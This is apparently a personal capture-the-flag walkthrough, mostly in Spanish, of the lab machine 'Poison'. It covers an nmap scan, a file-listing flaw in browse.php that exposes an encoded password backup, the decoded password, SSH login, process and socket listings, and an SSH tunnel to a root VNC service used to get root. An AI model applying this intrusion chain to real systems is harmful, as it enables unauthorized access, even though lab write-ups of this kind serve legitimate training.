6 de junio, la guardo para publicarla después
1 probe
Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-06 11:31 BST Nmap scan report for 10.10.10.84 Host is up (0.035s latency). Not shown: 98 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Encontre un info.php con lo que yo supongo es la fecha de instalación y los usuarios
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
En la página de incio dice que puedes probar una serie de archivos:
Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
http://10.10.10.84/browse.php?file=listfiles.php te muestra que hay un backup Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
http://10.10.10.84/pwdbackup.txt muestra This password is secure, it's encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=
Si lo decodeas con base 64 (porque tiene un signo de menos)
da Charix!2#4%6&8(0
asumimos que ese es el password y asi fue.
entrando después de subir el user flag puedes abrir el zip file con el mismo passwrod y te muestra
œš[|Õz!
Si escribes top puedes ver todo lo que esta corriendo
PID USERNAME THR PRI NICE SIZE RES STATE TIME WCPU COMMAND 543 root 2 20 0 56320K 5396K select 0:02 0.06% vmtoolsd 793 charix 1 20 0 20160K 3436K RUN 0:00 0.03% top 785 charix 1 20 0 85228K 7900K select 0:00 0.01% sshd 642 root 1 20 0 20636K 6140K select 0:00 0.00% sendmail 625 root 1 20 0 99172K 11516K select 0:00 0.00% httpd 319 root 1 20 0 9560K 5052K select 0:00 0.00% devd 390 root 1 20 0 10500K 2396K select 0:00 0.00% syslogd 529 root 1 20 0 23620K 8872K select 0:00 0.00% Xvnc 540 root 1 33 0 67220K 7064K select 0:00 0.00% xterm 782 root 1 20 0 85228K 7832K select 0:00 0.00% sshd 786 charix 1 20 0 19660K 3624K pause 0:00 0.00% csh 640 www 1 20 0 99M 11896K kqread 0:00 0.00% httpd 650 root 1 20 0 12592K 2436K nanslp 0:00 0.00% cron 620 root 1 20 0 57812K 7052K select 0:00 0.00% sshd 541 root 1 25 0 37620K 5312K select 0:00 0.00% twm 638 www 1 20 0 99M 11896K lockf 0:00 0.00% httpd 641 www 1 20 0 99M 11888K lockf 0:00 0.00% httpd
En este caso lo interesante podría ser el el vnc que asumo se podrá envenenar y por eso se llama poison, vamos a ver Lineum nada….
Sockstat
charix@Poison:/etc % sockstat USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS charix sshd 785 3 tcp4 10.10.10.84:22 10.10.14.6:50008 charix sshd 785 4 stream -> ?? root sshd 782 3 tcp4 10.10.10.84:22 10.10.14.6:50008 root sshd 782 5 stream -> ?? smmsp sendmail 646 3 dgram -> /var/run/log www httpd 645 3 tcp6 *:80 *:* www httpd 645 4 tcp4 *:80 *:* root sendmail 642 3 tcp4 127.0.0.1:25 *:* root sendmail 642 4 dgram -> /var/run/logpriv www httpd 641 3 tcp6 *:80 *:* www httpd 641 4 tcp4 *:80 *:* www httpd 640 3 tcp6 *:80 *:* www httpd 640 4 tcp4 *:80 *:* www httpd 639 3 tcp6 *:80 *:* www httpd 639 4 tcp4 *:80 *:* www httpd 638 3 tcp6 *:80 *:* www httpd 638 4 tcp4 *:80 *:* www httpd 637 3 tcp6 *:80 *:* www httpd 637 4 tcp4 *:80 *:* root httpd 625 3 tcp6 *:80 *:* root httpd 625 4 tcp4 *:80 *:* root sshd 620 3 tcp6 *:22 *:* root sshd 620 4 tcp4 *:22 *:* root twm 541 3 stream -> /tmp/.X11-unix/X1 root xterm 540 3 stream -> /tmp/.X11-unix/X1 root Xvnc 529 0 stream /tmp/.X11-unix/X1 root Xvnc 529 1 tcp4 127.0.0.1:5901 *:* root Xvnc 529 3 tcp4 127.0.0.1:5801 *:* root Xvnc 529 4 stream /tmp/.X11-unix/X1 root Xvnc 529 5 stream /tmp/.X11-unix/X1 root syslogd 390 4 dgram /var/run/log root syslogd 390 5 dgram /var/run/logpriv root syslogd 390 6 udp6 *:514 *:* root syslogd 390 7 udp4 *:514 *:* root devd 319 4 stream /var/run/devd.pipe root devd 319 5 seqpac /var/run/devd.seqpacket.pipe root devd 319 7 dgram -> /var/run/logpriv
Port 5901 Details
After several hours, I finally rooted the machine a few minutes ago. What I can add is,
- forget the secret file as long as you don’t know the vulnerable service.
- Once you know, what is running, you can google for how to use that service.
- There are tons of walkthroughs on how to setup a particular connection to that service.
Hope this does not reveal too much.
revisar esto: charix@Poison:/etc % locate Xvnc /usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__FreeBSD.cf /usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__Imake.cf /usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__vnclibs.def /usr/ports/net/tightvnc/files/patch-Xvnc__config__imake__imakemdep.h /usr/ports/net/tightvnc/files/patch-Xvnc__include__Xos.h /usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__dix__Imakefile /usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__hw__vnc__sockets.c /usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__hw__xfree86__common__compiler.h /usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__os__Imakefile /usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__os__access.c
in aonther screen ssh -L 5901:localhost:5901 [email protected] unzip secret.zip root@kali:~# '/root/Downloads/VNC-Viewer-6.17.1113-Linux-x64' 127.0.0.1:5901 -passwd /root/secret
and done we have root access
IPPSEC do that easier: